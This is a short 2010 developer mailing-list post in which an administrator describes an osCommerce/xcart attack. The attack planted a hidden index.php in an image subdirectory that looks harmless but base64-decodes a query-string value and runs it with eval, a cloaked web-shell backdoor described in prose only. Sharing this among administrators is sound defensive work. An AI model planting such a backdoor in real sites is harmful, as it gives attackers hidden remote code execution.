[development] Fully patched site hacked and cloaked
Jeff Greenberg
jeff at ayendesigns.com
Wed Jan 27 18:57:12 UTC 2010
On 1/27/2010 12:43 PM, Matt Chapman wrote:
> Also FTR, I've seen a similar (but not quite identical) sort of attack
> on a xcart installation on another host.
>
I've seen the osc / xcart attack. They created a subdirectory in the
image directory... /yahoo ... and put an index.php file in it. The file
checked the query string for a value. If it wasn't there, it would
simply display an osc heading. If the value was there, it grabbed a
base64 value from the query string, decoded it, and called eval against it.
More information about the development
mailing list